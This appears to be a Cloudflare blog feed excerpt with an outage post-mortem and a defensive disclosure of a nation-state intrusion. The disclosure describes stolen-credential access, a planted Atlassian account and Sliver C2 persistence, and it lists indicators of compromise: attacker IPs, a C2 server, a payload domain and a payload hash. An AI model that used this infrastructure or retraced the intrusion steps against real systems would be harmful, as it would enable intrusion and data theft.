href="https://www.cloudflare.com/pangea/"><b>Project Pangea</b></a>: Launched in 2021, Project Pangea is a program to provide secure, performant and reliable access to the Internet for community networks that support underserved communities.</p></li><li><p><a href="https://www.cloudflare.com/lp/project-safekeeping/"><b>Project Safekeeping</b></a>: Launched in 2022, Project Safekeeping supports at-risk critical infrastructure entities in Australia, Japan, Germany, Portugal, and the UK by providing Zero Trust and application security solutions.</p></li><li><p><a href="https://www.cloudflare.com/lp/cybersafe-schools/"><b>Project Cybersafe Schools</b></a>: Launched in 2023, Project Cybersafe Schools equips small public school districts in the US with Zero Trust services, including email protection and DNS filtering.</p></li><li><p><a href="/heeding-the-call-to-support-australias-most-at-risk-entities/"><b>Project Secure Health</b></a>: Launched on June 10, 2024, Project Secure Health provides security tools to Australia’s general practitioner clinics to safeguard patient data and counter challenges such as data breaches, ransomware attacks, phishing scams, and insider threats.</p></li></ul>
    <div>
      <h3>Looking forward</h3>
      <a href="#looking-forward">
        
      </a>
    </div>
    <p>The world has only gotten more complicated since we first launched Project Galileo in 2014. We face real challenges ranging from <a href="https://www.cloudflare.com/the-net/government/critical-infrastructure/">malicious cyber actors targeting critical infrastructure</a>, to election interference, to data theft. Governments have responded with increasingly aggressive attempts to control aspects of the Internet. At our recent celebration of Project Galileo, we lamented the thirteenth consecutive year of decline of global Internet freedom, as <a href="https://freedomhouse.org/sites/default/files/2023-10/Freedom-on-the-net-2023-DigitalBooklet.pdf">documented</a> by our Project Galileo partner Freedom House.</p><p>But one thing has not changed. We continue to believe the single, global Internet is a miracle that we should all be fighting for. We sometimes forget that the Internet is an incredibly radical concept. The world somehow came together over the last 40 years, agreed on a set of standards, and then made it so that a collection of networks could all exchange data. And that miracle that is the Internet has brought incredible opportunities for the voices of civil society to be heard, to help extend their impact, to spread their message, and to keep them connected.</p><p>Connecting everyone online in a permissionless way comes with real harms and real risks. But we need to be surgical as we address those challenges. We need to partner to find solutions that preserve the open Internet, much as we do with projects like Project Galileo. Even if we are at a moment of democratic decline, continuing to defend the open, interoperable Internet preserves space and capacity for a future in which the Internet can also fuel greater freedom.</p> ]]></content:encoded>
            <category><![CDATA[Project Galileo]]></category>
            <category><![CDATA[Cloudflare History]]></category>
            <category><![CDATA[Application Services]]></category>
            <category><![CDATA[Policy & Legal]]></category>
            <guid isPermaLink="false">1nBG09g7YJKTHpg8Yw0q2c</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>Alissa Starzak</dc:creator>
        </item>
        <item>
            <title><![CDATA[Major data center power failure (again): Cloudflare Code Orange tested]]></title>
            <link>https://blog.cloudflare.com/major-data-center-power-failure-again-cloudflare-code-orange-tested/</link>
            <pubDate>Mon, 08 Apr 2024 13:00:15 GMT</pubDate>
            <description><![CDATA[ Just four months after a complete power outage at a critical data center we were hit with the exact same scenario.  Here’s how we did this time, and what’s next ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4fn80cCKCVWYn0XOOh3eX2/e23f4144cdb106dc80bd3b8a27f27254/image3-11.png" />
            
            </figure><p>Here's a post we never thought we'd need to write: less than five months after one of our major data centers lost power, it happened again to the exact same data center. That sucks and, if you're thinking "why do they keep using this facility??," I don't blame you. We're thinking the same thing. But, here's the thing, while a lot may not have changed at the data center, a lot changed over those five months at Cloudflare. So, while five months ago a major data center going offline was really painful, this time it was much less so.</p><p>This is a little bit about how a high availability data center lost power for the second time in five months. But, more so, it's the story of how our team worked to ensure that even if one of our critical data centers lost power it wouldn't impact our customers.</p><p>On November 2, 2023, one of our critical facilities in the Portland, Oregon region lost power for an extended period of time. It happened because of a cascading series of faults that appears to have been caused by maintenance by the electrical grid provider, climaxing with a ground fault at the facility, and was made worse by a series of unfortunate incidents that prevented the facility from getting back online in a timely fashion.</p><p>If you want to read all the gory details, they're available <a href="/post-mortem-on-cloudflare-control-plane-and-analytics-outage/">here</a>.</p><p>It's painful whenever a data center has a complete loss of power, but it's something that we were supposed to expect. Unfortunately, in spite of that expectation, we hadn't enforced a number of requirements on our products that would ensure they continued running in spite of a major failure.</p><p>That was a mistake we were never going to allow to happen again.</p>
    <div>
      <h3>Code Orange</h3>
      <a href="#code-orange">
        
      </a>
    </div>
    <p>The incident was painful enough that we declared what we called Code Orange. We borrowed the idea from Google which, when they have an existential threat to their business, reportedly declares a Code Yellow or Code Red. Our logo is orange, so we altered the formula a bit.</p><p>Our conception of Code Orange was that the person who led the incident, in this case our SVP of Technical Operations, Jeremy Hartman, would be empowered to charge any engineer on our team to work on what he deemed the highest priority project. (Unless we declared a Code Red, which we actually ended up doing due to a hacking incident, and which would then take even higher priority. If you're interested, you can read more about that <a href="/thanksgiving-2023-security-incident/">here</a>.)</p><p>After getting through the immediate incident, Jeremy quickly triaged the most important work that needed to be done in order to ensure we'd be highly available even in the case of another catastrophic failure of a major data center facility. And the team got to work.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4Q7F31g2w6xPxdlq39dpDW/ad9a106fed84e8fcd728e165bfd2767a/image2-15.png" />
            
            </figure>
    <div>
      <h3>How'd we do?</h3>
      <a href="#howd-we-do">
        
      </a>
    </div>
    <p>We didn’t expect such an extensive real-world test so quickly, but the universe works in mysterious ways. On Tuesday, March 26, 2024, — just shy of five months after the initial incident — the same facility had another major power outage. Below, we'll get into what caused the outage this time, but what is most important is that it provided a perfect test for the work our team had done under Code Orange. So, what were the results?</p><p>First, let’s revisit what functions the Portland data centers at Cloudflare provide. As described in the November 2, 2023, <a href="/post-mortem-on-cloudflare-control-plane-and-analytics-outage/">post</a>, the control plane of Cloudflare primarily consists of the customer-facing interface for all of our services including our website and API. Additionally, the underlying services that provide the Analytics and Logging pipelines are primarily served from these facilities.</p><p>Just like in November 2023, we were alerted immediately that we had lost connectivity to our PDX01 data center. Unlike in November, we very quickly knew with certainty that we had once again lost all power, putting us in the exact same situation as five months prior. We also knew, based on a successful internal cut test in February, how our systems should react. We had spent months preparing, updating countless systems and activating huge amounts of network and server capacity, culminating with a test to prove the work was having the intended effect, which in this case was an automatic failover to the redundant facilities.</p><p>Our Control Plane consists of hundreds of internal services, and the expectation is that when we lose one of the three critical data centers in Portland, these services continue to operate normally in the remaining two facilities, and we continue to operate primarily in Portland. We have the capability to fail over to our European data centers in case our Portland centers are completely unavailable. However, that is a secondary option, and not something we pursue immediately.</p><p>On March 26, 2024, at 14:58 UTC, PDX01 lost power and our systems began to react. By 15:05 UTC, our APIs and Dashboards were operating normally, all without human intervention. Our primary focus over the past few months has been to make sure that our customers would still be able to configure and operate their Cloudflare services in case of a similar outage. There were a few specific services that required human intervention and therefore took a bit longer to recover, however the primary interface mechanism was operating as expected.</p><p>To put a finer point on this, during the November 2, 2023, incident the following services had at least six hours of control plane downtime, with several of them functionally degraded for days.</p><ul><li><p>API and Dashboard</p></li><li><p>Zero Trust</p></li><li><p>Magic Transit</p></li><li><p>SSL</p></li><li><p>SSL for SaaS</p></li><li><p>Workers</p></li><li><p>KV</p></li><li><p>Waiting Room</p></li><li><p>Load Balancing</p></li><li><p>Zero Trust Gateway</p></li><li><p>Access</p></li><li><p>Pages</p></li><li><p>Stream</p></li><li><p>Images</p></li></ul><p>During the March 26, 2024, incident, all of these services were up and running within minutes of the power failure, and many of them did not experience any impact at all during the failover.</p><p>The data plane, which handles the traffic that Cloudflare customers pass through our data centers in over 300 cities worldwide, was not impacted.</p><p>Our Analytics platform, which provides a view into customer traffic, was impacted and wasn’t fully restored until later that day. This was expected behavior as the Analytics platform is reliant on the PDX01 data center. Just like the Control Plane work, we began building new Analytics capacity immediately after the November 2, 2023, incident. However, the scale of the work requires that it will take a bit more time to complete. We have been working as fast as we can to remove this dependency, and we expect to complete this work in the near future.</p><p>Once we had validated the functionality of our Control Plane services, we were faced yet again with the cold start of a very large data center. This activity took roughly 72 hours in November 2023, but this time around we were able to complete this in roughly 10 hours. There is still work to be done to make that even faster in the future, and we will continue to refine our procedures in case we have a similar incident in the future.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7cu18EGvfdwXuXIr81qHN8/eaa05db6a5944d0270ed685ce558b070/Incident-inspection.png" />
            
            </figure>
    <div>
      <h3>How did we get here?</h3>
      <a href="#how-did-we-get-here">
        
      </a>
    </div>
    <p>As mentioned above, the power outage event from last November led us to introduce Code Orange, a process where we shift most or all engineering resources to addressing the issue at hand when there’s a significant event or crisis. Over the past five months, we shifted all non-critical engineering functions to focusing on ensuring high reliability of our control plane.</p><p>Teams across our engineering departments rallied to ensure our systems would be more resilient in the face of a similar failure in the future. Though the March 26, 2024, incident was unexpected, it was something we’d been preparing for.</p><p>The most obvious difference is the speed at which the control plane and APIs regained service. Without human intervention, the ability to log in and make changes to Cloudflare configuration was possible seven minutes after PDX01 was lost. This is due to our efforts to move all of our configuration databases to a Highly Available (HA) topology, and pre-provision enough capacity that we could absorb the capacity loss. More than 100 databases across over 20 different database clusters simultaneously failed out of the affected facility and restored service automatically. This was actually the culmination of over a year’s worth of work, and we make sure we prove our ability to failover properly with weekly tests.</p><p>Another significant improvement is the updates to our Logpush infrastructure. In November 2023, the loss of the PDX01 datacenter meant that we were unable to push logs to our customers. During Code Orange, we invested in making the Logpush infrastructure HA in Portland, and additionally created an active failover option in Amsterdam. Logpush took advantage of our massively expanded Kubernetes cluster that spans all of our Portland facilities and provides a seamless way for service owners to deploy HA compliant services that have resiliency baked in. In fact, during our February chaos exercise, we found a flaw in our Portland HA deployment, but customers were not impacted because the Amsterdam Logpush infrastructure took over successfully. During this event, we saw that the fixes we’d made since then worked, and we were able to push logs from the Portland region.</p><p>A number of other improvements in our Stream and Zero Trust products resulted in little to no impact to their operation. Our Stream products, which use a lot of compute resources to transcode videos, were able to seamlessly hand off to our Amsterdam facility to continue operations. Teams were given specific availability targets for the services and were provided several options to achieve those targets. Stream is a good example of a service that chose a different resiliency architecture but was able to seamlessly deliver their service during this outage. Zero Trust, which was also impacted in November 2023, has since moved the vast majority of its functionally to our hundreds of data centers, which kept working seamlessly throughout this event. Ultimately this is the strategy we are pushing all Cloudflare products to adopt as our data centers in <a href="https://www.cloudflare.com/network">over 300 cities worldwide</a> provide the highest level of availability possible.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4hnYtkVM6JHuvAOD3HGNmq/239ae0443184a22761245b4458e15ead/image1-12.png" />
            
            </figure>
    <div>
      <h3>What happened to the power in the data center?</h3>
      <a href="#what-happened-to-the-power-in-the-data-center">
        
      </a>
    </div>
    <p>On March 26, 2024, at 14:58 UTC, PDX01 experienced a total loss of power to Cloudflare’s physical infrastructure following a reportedly simultaneous failure of four Flexential-owned and operated switchboards serving all of Cloudflare’s cages. This meant both primary and redundant power paths were deactivated across the entire environment. During the Flexential investigation, engineers focused on a set of equipment known as Circuit Switch Boards, or CSBs. CSBs are likened to an electrical panel board, consisting of a main input circuit breaker and series of smaller output breakers. Flexential engineers reported that infrastructure upstream of the CSBs (power feed, generator, UPS &amp; PDU/transformer) was not impacted and continued to act normally. Similarly, infrastructure downstream from the CSBs such as Remote Power Panels and connected switchgear was not impacted – thus implying the outage was isolated to the CSBs themselves.</p><p>Initial assessment of the root cause of Flexential’s CSB failures points to incorrectly set breaker coordination settings within the four CSBs as one contributing factor. Trip settings which are too restrictive can result in overly sensitive overcurrent protection and the potential nuisance tripping of devices. In our case, Flexential’s breaker settings within the four CSBs were reportedly too low in relation to the downstream provisioned power capacities. When one or more of these breakers tripped, a cascading failure of the remaining active CSB boards resulted, thus causing a total loss of power serving Cloudflare’s cage and others on the shared infrastructure. During the triage of the incident, we were told that the Flexential facilities team noticed the incorrect trip settings, reset the CSBs and adjusted them to the expected values, enabling our team to power up our servers in a staged and controlled fashion. We do not know when these settings were established – typically, these would be set/adjusted as part of a data center commissioning process and/or breaker coordination study before customer critical loads are installed.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3lJDAVlXMNrU7Eyp7PP0lF/db9a86dfa40f4ca85965d8af8b36c634/Incident-inspection-3.png" />
            
            </figure>
    <div>
      <h3>What’s next?</h3>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>Our top priority is completing the resilience program for our Analytics platform. Analytics aren’t simply pretty charts in a dashboard. When you want to check the status of attacks, activities a firewall is blocking, or even the status of Cloudflare Tunnels - you need analytics. We have evidence that the resiliency pattern we are adopting works as expected, so this remains our primary focus, and we will progress as quickly as possible.</p><p>There were some services that still required manual intervention to properly recover, and we have collected data and action items for each of them to ensure that further manual action is not required. We will continue to use production cut tests to prove all of these changes and enhancements provide the resiliency that our customers expect.</p><p>We will continue to work with Flexential on follow-up activities to expand our understanding of their operational and review procedures to the greatest extent possible. While this incident was limited to a single facility, we will turn this exercise into a process that ensures we have a similar view into all of our critical data center facilities.</p><p>Once again, we are very sorry for the impact to our customers, particularly those that rely on the Analytics engine who were unable to access that product feature during the incident. Our work over the past four months has yielded the results that we expected, and we will stay absolutely focused on completing the remaining body of work.</p> ]]></content:encoded>
            <category><![CDATA[Post Mortem]]></category>
            <category><![CDATA[Outage]]></category>
            <guid isPermaLink="false">3jSHB2RGdy2XNScvpyF1oX</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>John Graham-Cumming</dc:creator>
            <dc:creator>Jeremy Hartman</dc:creator>
        </item>
        <item>
            <title><![CDATA[Thanksgiving 2023 security incident]]></title>
            <link>https://blog.cloudflare.com/thanksgiving-2023-security-incident/</link>
            <pubDate>Thu, 01 Feb 2024 20:00:24 GMT</pubDate>
            <description><![CDATA[ On Thanksgiving Day, November 23, 2023, Cloudflare detected a threat actor on our self-hosted Atlassian server. Our security team immediately began an investigation, cut off the threat actor’s access, and no Cloudflare customer data or systems were impacted by this event ]]></description>
            <content:encoded><![CDATA[ <p></p><p>On Thanksgiving Day, November 23, 2023, Cloudflare detected a threat actor on our self-hosted Atlassian server. Our security team immediately began an investigation, cut off the threat actor’s access, and on Sunday, November 26, we brought in CrowdStrike’s Forensic team to perform their own independent analysis.</p><p>Yesterday, CrowdStrike completed its investigation, and we are publishing this blog post to talk about the details of this security incident.</p><p>We want to emphasize to our customers that no Cloudflare customer data or systems were impacted by this event. Because of our access controls, firewall rules, and use of hard security keys enforced using our own Zero Trust tools, the threat actor’s ability to move laterally was limited. No services were implicated, and no changes were made to our global network systems or configuration. This is the promise of a Zero Trust architecture: it’s like bulkheads in a ship where a compromise in one system is limited from compromising the whole organization.</p><p>From November 14 to 17, a threat actor did reconnaissance and then accessed our internal wiki (which uses Atlassian Confluence) and our bug database (Atlassian Jira). On November 20 and 21, we saw additional access indicating they may have come back to test access to ensure they had connectivity.</p><p>They then returned on November 22 and established persistent access to our Atlassian server using ScriptRunner for Jira, gained access to our source code management system (which uses Atlassian Bitbucket), and tried, unsuccessfully, to access a console server that had access to the data center that Cloudflare had not yet put into production in São Paulo, Brazil.</p><p>They did this by using one access token and three service account credentials that had been taken, and that we failed to rotate, after the <a href="/how-cloudflare-mitigated-yet-another-okta-compromise">Okta compromise of October 2023</a>. All threat actor access and connections were terminated on November 24 and CrowdStrike has confirmed that the last evidence of threat activity was on November 24 at 10:44.</p><p><i>(Throughout this blog post all dates and times are UTC.)</i></p><p>Even though we understand the operational impact of the incident to be extremely limited, we took this incident very seriously because a threat actor had used stolen credentials to get access to our Atlassian server and accessed some documentation and a limited amount of source code. Based on our collaboration with colleagues in the industry and government, we believe that this attack was performed by a nation state attacker with the goal of obtaining persistent and widespread access to Cloudflare’s global network.</p>
    <div>
      <h3>“Code Red” Remediation and Hardening Effort</h3>
      <a href="#code-red-remediation-and-hardening-effort">
        
      </a>
    </div>
    <p>On November 24, after the threat actor was removed from our environment, our security team pulled in all the people they needed across the company to investigate the intrusion and ensure that the threat actor had been completely denied access to our systems, and to ensure we understood the full extent of what they accessed or tried to access.</p><p>Then, from November 27, we redirected the efforts of a large part of the Cloudflare technical staff (inside and outside the security team) to work on a single project dubbed “Code Red”. The focus was strengthening, validating, and remediating any control in our environment to ensure we are secure against future intrusion and to validate that the threat actor could not gain access to our environment. Additionally, we continued to investigate every system, account and log to make sure the threat actor did not have persistent access and that we fully understood what systems they had touched and which they had attempted to access.</p><p>CrowdStrike performed an independent assessment of the scope and extent of the threat actor’s activity, including a search for any evidence that they still persisted in our systems. CrowdStrike’s investigation provided helpful corroboration and support for our investigation, but did not bring to light any activities that we had missed. This blog post outlines in detail everything we and CrowdStrike uncovered about the activity of the threat actor.</p><p>The only production systems the threat actor could access using the stolen credentials was our Atlassian environment. Analyzing the wiki pages they accessed, bug database issues, and source code repositories, it appears they were looking for information about the architecture, security, and management of our global network; no doubt with an eye on gaining a deeper foothold. Because of that, we decided a huge effort was needed to further harden our security protocols to prevent the threat actor from being able to get that foothold had we overlooked something from our log files.</p><p>Our aim was to prevent the attacker from using the technical information about the operations of our network as a way to get back in. Even though we believed, and later confirmed, the attacker had limited access, we undertook a comprehensive effort to rotate every production credential (more than 5,000 individual credentials), physically segment test and staging systems, performed forensic triages on 4,893 systems, reimaged and rebooted every machine in our global network including all the systems the threat actor accessed and all Atlassian products (Jira, Confluence, and Bitbucket).</p><p>The threat actor also attempted to access a console server in our new, and not yet in production, data center in São Paulo. All attempts to gain access were unsuccessful. To ensure these systems are 100% secure, equipment in the Brazil data center was returned to the manufacturers. The manufacturers’ forensic teams examined all of our systems to ensure that no access or persistence was gained. Nothing was found, but we replaced the hardware anyway.</p><p>We also looked for software packages that hadn’t been updated, user accounts that might have been created, and unused active employee accounts; we went searching for secrets that might have been left in Jira tickets or source code, examined and deleted all HAR files uploaded to the wiki in case they contained tokens of any sort. Whenever in doubt, we assumed the worst and made changes to ensure anything the threat actor was able to access would no longer be in use and therefore no longer be valuable to them.</p><p>Every member of the team was encouraged to point out areas the threat actor might have touched, so we could examine log files and determine the extent of the threat actor’s access. By including such a large number of people across the company, we aimed to leave no stone unturned looking for evidence of access or changes that needed to be made to improve security.</p><p>The immediate “Code Red” effort ended on January 5, but work continues across the company around credential management, software hardening, vulnerability management, additional alerting, and more.</p>
    <div>
      <h3>Attack timeline</h3>
      <a href="#attack-timeline">
        
      </a>
    </div>
    <p>The attack started in October with the compromise of Okta, but the threat actor only began targeting our systems using those credentials from the Okta compromise in mid-November.</p><p>The following timeline shows the major events:</p>
    <div>
      <h3>October 18 - Okta compromise</h3>
      <a href="#october-18-okta-compromise">
        
      </a>
    </div>
    <p>We’ve <a href="/how-cloudflare-mitigated-yet-another-okta-compromise">written about this before</a> but, in summary, we were (for the second time) the victim of a compromise of Okta’s systems which resulted in a threat actor gaining access to a set of credentials. These credentials were meant to all be rotated.</p><p>Unfortunately, we failed to rotate one service token and three service accounts (out of thousands) of credentials that were leaked during the Okta compromise.</p><p>One was a Moveworks service token that granted remote access into our Atlassian system. The second credential was a service account used by the SaaS-based Smartsheet application that had administrative access to our Atlassian Jira instance, the third account was a Bitbucket service account which was used to access our source code management system, and the fourth was an AWS environment that had no access to the global network and no customer or sensitive data.</p><p>The one service token and three accounts were not rotated because mistakenly it was believed they were unused. This was incorrect and was how the threat actor first got into our systems and gained persistence to our Atlassian products. Note that this was in no way an error on the part of Atlassian, AWS, Moveworks or Smartsheet. These were merely credentials which we failed to rotate.</p>
    <div>
      <h3>November 14 09:22:49 - threat actor starts probing</h3>
      <a href="#november-14-09-22-49-threat-actor-starts-probing">
        
      </a>
    </div>
    <p>Our logs show that the threat actor started probing and performing reconnaissance of our systems beginning on November 14, looking for a way to use the credentials and what systems were accessible. They attempted to log into our Okta instance and were denied access. They attempted access to the Cloudflare Dashboard and were denied access.</p><p>Additionally, the threat actor accessed an AWS environment that is used to power the Cloudflare Apps marketplace. This environment was segmented with no access to global network or customer data. The service account to access this environment was revoked, and we validated the integrity of the environment.</p>
    <div>
      <h3>November 15 16:28:38 - threat actor gains access to Atlassian services</h3>
      <a href="#november-15-16-28-38-threat-actor-gains-access-to-atlassian-services">
        
      </a>
    </div>
    <p>The threat actor successfully accessed Atlassian Jira and Confluence on November 15 using the Moveworks service token to authenticate through our gateway, and then they used the Smartsheet service account to gain access to the Atlassian suite. The next day they began looking for information about the configuration and management of our global network, and accessed various Jira tickets.</p><p>The threat actor searched the wiki for things like remote access, secret, client-secret, openconnect, cloudflared, and token. They accessed 36 Jira tickets (out of a total of 2,059,357 tickets) and 202 wiki pages (out of a total of 194,100 pages).</p><p>The threat actor accessed Jira tickets about vulnerability management, secret rotation, MFA bypass, network access, and even our response to the Okta incident itself.</p><p>The wiki searches and pages accessed suggest the threat actor was very interested in all aspects of access to our systems: password resets, remote access, configuration, our use of Salt, but they did not target customer data or customer configurations.</p>
    <div>
      <h3>November 16 14:36:37 - threat actor creates an Atlassian user account</h3>
      <a href="#november-16-14-36-37-threat-actor-creates-an-atlassian-user-account">
        
      </a>
    </div>
    <p>The threat actor used the Smartsheet credential to create an Atlassian account that looked like a normal Cloudflare user. They added this user to a number of groups within Atlassian so that they’d have persistent access to the Atlassian environment should the Smartsheet service account be removed.</p>
    <div>
      <h3>November 17 14:33:52 to November 20 09:26:53 - threat actor takes a break from accessing Cloudflare systems</h3>
      <a href="#november-17-14-33-52-to-november-20-09-26-53-threat-actor-takes-a-break-from-accessing-cloudflare-systems">
        
      </a>
    </div>
    <p>During this period, the attacker took a break from accessing our systems (apart from apparently briefly testing that they still had access) and returned just before Thanksgiving.</p>
    <div>
      <h3>November 22 14:18:22 - threat actor gains persistence</h3>
      <a href="#november-22-14-18-22-threat-actor-gains-persistence">
        
      </a>
    </div>
    <p>Since the Smartsheet service account had administrative access to Atlassian Jira, the threat actor was able to install the Sliver Adversary Emulation Framework, which is a widely used tool and framework that red teams and attackers use to enable “C2” (command and control), connectivity gaining persistent and stealthy access to a computer on which it is installed. Sliver was installed using the ScriptRunner for Jira plugin.</p><p>This allowed them continuous access to the Atlassian server, and they used this to attempt lateral movement. With this access the Threat Actor attempted to gain access to a non-production console server in our São Paulo, Brazil data center due to a non-enforced ACL. The access was denied, and they were not able to access any of the global network.</p><p>Over the next day, the threat actor viewed 120 code repositories (out of a total of 11,904 repositories). Of the 120, the threat actor used the Atlassian Bitbucket git archive feature on 76 repositories to download them to the Atlassian server, and even though we were not able to confirm whether or not they had been exfiltrated, we decided to treat them as having been exfiltrated.</p><p>The 76 source code repositories were almost all related to how backups work, how the global network is configured and managed, how identity works at Cloudflare, remote access, and our use of Terraform and Kubernetes. A small number of the repositories contained encrypted secrets which were rotated immediately even though they were strongly encrypted themselves.</p><p>We focused particularly on these 76 source code repositories to look for embedded secrets, (secrets stored in the code were rotated), vulnerabilities and ways in which an attacker could use them to mount a subsequent attack. This work was done as a priority by engineering teams across the company as part of “Code Red”.</p><p>As a SaaS company, we’ve long believed that our source code itself is not as precious as the source code of software companies that distribute software to end users. In fact, we’ve open sourced a large amount of our source code and speak openly through our blog about algorithms and techniques we use. So our focus was not on someone having access to the source code, but whether that source code contained embedded secrets (such as a key or token) and vulnerabilities.</p>
    <div>
      <h3>November 23 - Discovery and threat actor access termination begins</h3>
      <a href="#november-23-discovery-and-threat-actor-access-termination-begins">
        
      </a>
    </div>
    <p>Our security team was alerted to the threat actor’s presence at 16:00 and deactivated the Smartsheet service account 35 minutes later. 48 minutes later the user account created by the threat actor was found and deactivated. Here’s the detailed timeline for the major actions taken to block the threat actor once the first alert was raised.</p><p>15:58 - The threat actor adds the Smartsheet service account to an administrator group.16:00 - Automated alert about the change at 15:58 to our security team.16:12 - Cloudflare SOC starts investigating the alert.16:35 - Smartsheet service account deactivated by Cloudflare SOC.17:23 - The threat actor-created Atlassian user account is found and deactivated.17:43 - Internal Cloudflare incident declared.21:31 - Firewall rules put in place to block the threat actor’s known IP addresses.</p>
    <div>
      <h3>November 24 - Sliver removed; all threat actor access terminated</h3>
      <a href="#november-24-sliver-removed-all-threat-actor-access-terminated">
        
      </a>
    </div>
    <p>10:44 - Last known threat actor activity.11:59 - Sliver removed.</p><p>Throughout this timeline, the threat actor tried to access a myriad of other systems at Cloudflare but failed because of our access controls, firewall rules, and use of hard security keys enforced using our own Zero Trust tools.</p><p>To be clear, we saw no evidence whatsoever that the threat actor got access to our global network, data centers, SSL keys, customer databases or configuration information, Cloudflare Workers deployed by us or customers, AI models, network infrastructure, or any of our datastores like Workers KV, R2 or Quicksilver. Their access was limited to the Atlassian suite and the server on which our Atlassian runs.</p><p>A large part of our “Code Red” effort was understanding what the threat actor got access to and what they tried to access. By looking at logging across systems we were able to track attempted access to our internal metrics, network configuration, build system, alerting systems, and release management system. Based on our review, none of their attempts to access these systems were successful. Independently, CrowdStrike performed an assessment of the scope and extent of the threat actor’s activity, which did not bring to light activities that we had missed and concluded that the last evidence of threat activity was on November 24 at 10:44.</p><p>We are confident that between our investigation and CrowdStrike’s, we fully understand the threat actor’s actions and that they were limited to the systems on which we saw their activity.</p>
    <div>
      <h3>Conclusion</h3>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>This was a security incident involving a sophisticated actor, likely a nation-state, who operated in a thoughtful and methodical manner. The efforts we have taken ensure that the ongoing impact of the incident was limited and that we are well-prepared to fend off any sophisticated attacks in the future. This required the efforts of a significant number of Cloudflare’s engineering staff, and, for over a month, this was the highest priority at Cloudflare. The entire Cloudflare team worked to ensure that our systems were secure, the threat actor’s access was understood, to remediate immediate priorities (such as mass credential rotation), and to build a plan of long-running work to improve our overall security based on areas for improvement discovered during this process.</p><p>We are incredibly grateful to everyone at Cloudflare who responded quickly over the Thanksgiving holiday to conduct an initial analysis and lock out the threat actor, and all those who contributed to this effort. It would be impossible to name everyone involved, but their long hours and dedicated work made it possible to undertake an essential review and change of Cloudflare’s security while keeping our global network running and our customers’ service running.</p><p>We are grateful to CrowdStrike for having been available immediately to conduct an independent assessment. Now that their final report is complete, we are confident in our internal analysis and remediation of the intrusion and are making this blog post available.</p><p><b>IOCs</b>Below are the Indications of Compromise (IOCs) that we saw from this threat actor. We are publishing them so that other organizations, and especially those that may have been impacted by the Okta breach, can search their logs to confirm the same threat actor did not access their systems.</p>
<table>
<thead>
  <tr>
    <th><span>Indicator</span></th>
    <th><span>Indicator Type</span></th>
    <th><span>SHA256</span></th>
    <th><span>Description</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>193.142.58[.]126 </span></td>
    <td><span>IPv4</span></td>
    <td><span>N/A</span></td>
    <td><span>Primary threat actor</span><br /><span>Infrastructure, owned by</span><br /><span>M247 Europe SRL (Bucharest,</span><br /><span>Romania)</span></td>
  </tr>
  <tr>
    <td><span>198.244.174[.]214 </span></td>
    <td><span>IPv4</span></td>
    <td><span>N/A</span></td>
    <td><span>Sliver C2 server, owned by</span><br /><span>OVH SAS (London, England)</span></td>
  </tr>
  <tr>
    <td><span>idowall[.]com</span></td>
    <td><span>Domain</span></td>
    <td><span>N/A</span></td>
    <td><span>Infrastructure serving Sliver</span><br /><span>payload</span></td>
  </tr>
  <tr>
    <td><span>jvm-agent</span></td>
    <td><span>Filename</span></td>
    <td><span>bdd1a085d651082ad567b03e5186d1d4<br />6d822bb7794157ab8cce95d850a3caaf</span></td>
    <td><span>Sliver payload</span></td>
  </tr>
</tbody>
</table><p></p> ]]></content:encoded>
            <category><![CDATA[Security]]></category>
            <guid isPermaLink="false">4iLxjDabtXj9DBA7dv3Wig</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>John Graham-Cumming</dc:creator>
            <dc:creator>Grant Bourzikas</dc:creator>
        </item>
        <item>
            <title><![CDATA[Post mortem on the Cloudflare Control Plane and Analytics Outage]]></title>
            <link>https://blog.cloudflare.com/post-mortem-on-cloudflare-control-plane-and-analytics-outage/</link>
            <pubDate>Sat, 04 Nov 2023 06:18:55 GMT</pubDate>
            <description><![CDATA[ Beginning on Thursday, November 2, 2023, at 11:43 UTC Cloudflare's control plane and analytics services experienced an outage. Here are the details ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Beginning on Thursday, November 2, 2023, at 11:43 UTC Cloudflare's control plane and analytics services experienced an outage. The control plane of Cloudflare consists primarily of the customer-facing interface for all of our services including our website and APIs. Our analytics services include logging and analytics reporting.</p><p>The incident lasted from November 2 at 11:44 UTC until November 4 at 04:25 UTC. We were able to restore most of our control plane at our disaster recovery facility as of November 2 at 17:57 UTC. Many customers would not have experienced issues with most of our products after the disaster recovery facility came online. However, other services took longer to restore and customers that used them may have seen issues until we fully resolved the incident. Our raw log services were unavailable for most customers for the duration of the incident.</p><p>Services have now been restored for all customers. Throughout the incident, Cloudflare's network and security services continued to work as expected. While there were periods where customers were unable to make changes to those services, traffic through our network was not impacted.</p><p>This post outlines the events that caused this incident, the architecture we had in place to prevent issues like this, what failed, what worked and why, and the changes we're making based on what we've learned over the last 36 hours.</p><p>To start, this never should have happened. We believed that we had high availability systems in place that should have stopped an outage like this, even when one of our core data center providers failed catastrophically. And, while many systems did remain online as designed, some critical systems had non-obvious dependencies that made them unavailable. I am sorry and embarrassed for this incident and the pain that it caused our customers and our team.</p>
    <div>
      <h3>Intended Design</h3>
      <a href="#intended-design">
        
      </a>
    </div>
